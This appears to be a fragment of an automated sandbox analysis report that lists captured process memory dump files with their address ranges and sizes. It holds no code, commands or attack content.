memory/1980-105-0x0000000002530000-0x000000000317A000-memory.dmpFilesize
12.3MB
-
memory/1980-111-0x0000000004CF0000-0x0000000004FC2000-memory.dmpFilesize
2.8MB
-
memory/2016-113-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmpFilesize
8KB
-
memory/2016-112-0x0000000000000000-mapping.dmp
-
memory/2020-128-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/2020-129-0x0000000000401364-mapping.dmp
-
memory/2020-130-0x0000000000630000-0x0000000000783000-memory.dmpFilesize
1.3MB
-
memory/2028-133-0x0000000000000000-mapping.dmp